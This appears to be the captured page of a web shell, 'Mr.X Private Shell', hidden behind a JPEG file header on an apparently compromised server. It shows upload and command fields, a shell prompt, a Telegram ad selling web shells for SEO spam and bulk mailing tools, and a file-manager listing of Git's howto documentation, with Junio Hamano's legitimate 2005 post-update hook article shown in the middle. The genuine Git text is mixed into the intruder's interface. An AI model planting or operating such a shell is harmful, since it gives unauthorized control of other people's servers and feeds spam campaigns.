����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
Subject: [HOWTO] Using post-update hook
Message-ID: <7vy86o6usx.fsf@assigned-by-dhcp.cox.net>
From: Junio C Hamano <gitster@pobox.com>
Date: Fri, 26 Aug 2005 18:19:10 -0700
Abstract: In this how-to article, JC talks about how he
 uses the post-update hook to automate Git documentation page
 shown at https://www.kernel.org/pub/software/scm/git/docs/.
Content-type: text/asciidoc

How to rebuild from update hook
===============================

The pages under https://www.kernel.org/pub/software/scm/git/docs/
are built from Documentation/ directory of the git.git project
and needed to be kept up-to-date.  The www.kernel.org/ servers
are mirrored and I was told that the origin of the mirror is on
the machine $some.kernel.org, on which I was given an account
when I took over Git maintainership from Linus.

The directories relevant to this how-to are these two:

    /pub/scm/git/git.git/	The public Git repository.
    /pub/software/scm/git/docs/	The HTML documentation page.

So I made a repository to generate the documentation under my
home directory over there.

    $ cd
    $ mkdir doc-git && cd doc-git
    $ git clone /pub/scm/git/git.git/ docgen

What needs to happen is to update the $HOME/doc-git/docgen/
working tree, build HTML docs there and install the result in
/pub/software/scm/git/docs/ directory.  So I wrote a little
script:

    $ cat >dododoc.sh <<\EOF
    #!/bin/sh
    cd $HOME/doc-git/docgen || exit

    unset GIT_DIR

    git pull /pub/scm/git/git.git/ master &&
    cd Documentation &&
    make install-webdoc
    EOF

Initially I used to run this by hand whenever I push into the
public Git repository.  Then I did a cron job that ran twice a
day.  The current round uses the post-update hook mechanism,
like this:

    $ cat >/pub/scm/git/git.git/hooks/post-update <<\EOF
    #!/bin/sh
    #
    # An example hook script to prepare a packed repository for use over
    # dumb transports.
    #
    # To enable this hook, make this file executable by "chmod +x post-update".

    case " $* " in
    *' refs/heads/master '*)
            echo $HOME/doc-git/dododoc.sh | at now
            ;;
    esac
    exec git-update-server-info
    EOF
    $ chmod +x /pub/scm/git/git.git/hooks/post-update

There are four things worth mentioning:

 - The update-hook is run after the repository accepts a "git
   push", under my user privilege.  It is given the full names
   of refs that have been updated as arguments.  My post-update
   runs the dododoc.sh script only when the master head is
   updated.

 - When update-hook is run, GIT_DIR is set to '.' by the calling
   receive-pack.  This is inherited by the dododoc.sh run via
   the "at" command, and needs to be unset; otherwise, "git
   pull" it does into $HOME/doc-git/docgen/ repository would not
   work correctly.

 - The stdout of update hook script is not connected to git
   push; I run the heavy part of the command inside "at", to
   receive the execution report via e-mail.

 - This is still crude and does not protect against simultaneous
   make invocations stomping on each other.  I would need to add
   some locking mechanism for this.

Filemanager

Name Type Size Permission Actions
coordinate-embargoed-releases.adoc File 10.57 KB 0644
coordinate-embargoed-releases.html File 42.42 KB 0644
howto-index.sh File 706 B 0755
keep-canonical-history-correct.adoc File 6.63 KB 0644
keep-canonical-history-correct.html File 39.04 KB 0644
maintain-git.adoc File 23.74 KB 0644
maintain-git.html File 59.48 KB 0644
meson.build File 1.43 KB 0644
new-command.adoc File 4.35 KB 0644
new-command.html File 35.11 KB 0644
rebase-from-internal-branch.adoc File 6.16 KB 0644
rebase-from-internal-branch.html File 37.27 KB 0644
rebuild-from-update-hook.adoc File 3.06 KB 0644
rebuild-from-update-hook.html File 33.38 KB 0644
recover-corrupted-blob-object.adoc File 5.38 KB 0644
recover-corrupted-blob-object.html File 36.74 KB 0644
recover-corrupted-object-harder.adoc File 14.28 KB 0644
recover-corrupted-object-harder.html File 48.43 KB 0644
revert-a-faulty-merge.adoc File 10.6 KB 0644
revert-a-faulty-merge.html File 43.48 KB 0644
revert-branch-rebase.adoc File 7.64 KB 0644
revert-branch-rebase.html File 37.57 KB 0644
separating-topic-branches.adoc File 3.28 KB 0644
separating-topic-branches.html File 33.54 KB 0644
setup-git-server-over-http.adoc File 8.41 KB 0644
setup-git-server-over-http.html File 43.08 KB 0644
update-hook-example.adoc File 6.11 KB 0644
update-hook-example.html File 36.14 KB 0644
use-git-daemon.adoc File 2.08 KB 0644
use-git-daemon.html File 32.79 KB 0644
using-merge-subtree.adoc File 2.95 KB 0644
using-merge-subtree.html File 33.39 KB 0644
using-signed-tag-in-pull-request.adoc File 8.09 KB 0644
using-signed-tag-in-pull-request.html File 39.72 KB 0644